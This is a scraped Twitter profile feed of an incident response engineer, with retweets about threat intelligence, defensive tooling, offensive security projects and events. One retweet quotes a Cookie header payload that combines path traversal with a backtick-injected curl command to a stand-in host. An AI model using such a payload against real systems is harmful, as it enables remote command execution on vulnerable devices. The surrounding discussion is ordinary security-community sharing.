Golgothus (Zach He/Him)(@Golgothus) 's Twitter Profileg
Golgothus (Zach He/Him)

@Golgothus

Senior Incident Response Engineer | Threat Hunting, IR, Cloud | ENFJ | https://t.co/78ZPXqXGxN Your friendly CSO! (Chief Soap Officer)

ID:868367376

linkhttps://docs.golgothus.tech/ calendar_today08-10-2012 17:33:57

18,4K Tweets

1,2K Followers

667 Following

Thomas Roccia ๐Ÿค˜(@fr0gger_) 's Twitter Profile Photo

I just came across a tool called AttackGen. It's a simple tool that generates incident scenarios based on a Threat Actor and suggests simulations and possible detections at a high level.

๐Ÿ‘‰ code: github.com/mrwadams/attacโ€ฆ
๐Ÿ‘‰ app: attackgen.streamlit.app

I just came across a tool called AttackGen. It's a simple tool that generates incident scenarios based on a Threat Actor and suggests simulations and possible detections at a high level. #llm #python #threatintel ๐Ÿ‘‰ code: github.com/mrwadams/attacโ€ฆ ๐Ÿ‘‰ app: attackgen.streamlit.app
account_circle
Golgothus (Zach He/Him)(@Golgothus) 's Twitter Profile Photo

I have to pull myself back sometimes so I don't be the asshat no one goes to for support, cause that sucks.

It's great being able to see what kind of shenanigans the associates in my organization get into and try to pursue.

account_circle
Evan McBroom(@mcbroom_evan) 's Twitter Profile Photo

I just published a blog and tool for the LSA Whisperer work that was presented at the SpecterOps Conference (SOCON) back in March.

If you are interested in getting credentials from LSASS without accessing its memory, check it out!
medium.com/specter-ops-poโ€ฆ

account_circle
Charity Wright(@CharityW4CTI) 's Twitter Profile Photo

Join me and my colleagues at the Dallas Intelligence Roadshow where we will dine, network, learn, and explore how threat intelligence is a transformative catalyst for your security program. Registration is free and you will earn CPE credits. sprou.tt/1FMmj3fdxCF

account_circle
Andrew Thompson(@ImposeCost) 's Twitter Profile Photo

This is a long time coming. ๐Ÿ‡ท๐Ÿ‡บAPT44: Unearthing Sandworm: services.google.com/fh/files/misc/โ€ฆ

This is a long time coming. ๐Ÿ‡ท๐Ÿ‡บAPT44: Unearthing Sandworm: services.google.com/fh/files/misc/โ€ฆ
account_circle
HotCakeX ๐Ÿ‡ฎ๐Ÿ‡ฑ(@CyberCakeX) 's Twitter Profile Photo

YouTube demo of how to use the WDACConfig module to create Application control for business policies straight from the cloud, MSFT Defender for Endpoint Advanced Hunting. It has commentary ๐Ÿ—ฃ๏ธ and everything properly explained ๐Ÿซฐ



youtube.com/watch?v=oyz0jFโ€ฆ

account_circle
Microsoft Threat Intelligence(@MsftSecIntel) 's Twitter Profile Photo

Learn how Microsoft Copilot for Security can empower cybersecurity professionals to transform how they approach threat intelligence in this Microsoft Threat Intelligence Podcast episode with Brandon Dixon, Vasu Jakkal, and podcast host Sherrod DeGrippo ๐Ÿฆ“: msft.it/6015Y6aUf

account_circle
Hack FtW(@Hack_FtW) 's Twitter Profile Photo

Come on out to our spring roundup tonight from 7-9. Golgothus (Zach He/Him) will be on hand dropping some sick knowledge. Location is Lot12: lot12tcu.com
Mouze Chad

account_circle
Rio(@0x09AL) 's Twitter Profile Photo

Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/ohno`curl${IFS}evil-com`;
Read the blogpost though as it's pretty interesting and not a simple stupid directory traversal bug.

account_circle
MadHat Unspecific, InfoSec Mercenary(@unspecific) 's Twitter Profile Photo

Asking for a friend. New business. Subscription. Needs an acquirer that does tokenization and monthly reoccurring payments. I have done this but not in the same are he is in or at the scale (small). Does anyone have personal experience that can talk to me?

account_circle
Red Siege Information Security(@RedSiege) 's Twitter Profile Photo

๐Ÿ›  NEW TOOL ๐Ÿ› 

Introducing: Delta Encoder
Developed by Senior Security Consultant Corey Overstreet Covers

Link: redsiege.com/delta

A new tool for obfuscating shellcode without using common encryption or encoding methods.

๐Ÿ›  NEW TOOL ๐Ÿ›  Introducing: Delta Encoder Developed by Senior Security Consultant Corey Overstreet @retronaut7 Link: redsiege.com/delta A new tool for obfuscating shellcode without using common encryption or encoding methods. #hacking #infosec #cybersecurity
account_circle
Matt Zorich(@reprise_99) 's Twitter Profile Photo

If you want to play with KQL and use some of your own data rather than sample data, set yourself up a free Azure Data Explorer (ADX) cluster. No credit card or Azure subscription required, 100 GB storage, it is great for testing and ad-hoc analysis - learn.microsoft.com/en-us/azure/daโ€ฆ

account_circle
vx-underground(@vxunderground) 's Twitter Profile Photo

Here is your daily dose of LOLWTF

- Toyota Brazil ransomed by Hunters International ransomware group
- Department of Insurance, Securities and Banking ransomed by Lockbit ransomware group
- Probably like a dozen or so small businesses ransomed which are unable to affordโ€ฆ

account_circle
Golgothus (Zach He/Him)(@Golgothus) 's Twitter Profile Photo

I love when a random person asks you to help buy one thing in a store, then go on a 'buying spree', grabbing 3 of each item, like bruh

I despise people since 'good deeds' almost always get burnt, exploited in this situation ๐Ÿ˜‘

account_circle
Graham Helton(@GrahamHelton3) 's Twitter Profile Photo

๐Ÿšจ I'm super excited to announce the project I've been pouring all of my free time into this past month.

The Kubenomicon: An open source offensive security focused threat matrix for kubernetes with an emphasis on walking through how to exploit each attack. Get more info below!

๐Ÿšจ I'm super excited to announce the project I've been pouring all of my free time into this past month. The Kubenomicon: An open source offensive security focused threat matrix for kubernetes with an emphasis on walking through how to exploit each attack. Get more info below!
account_circle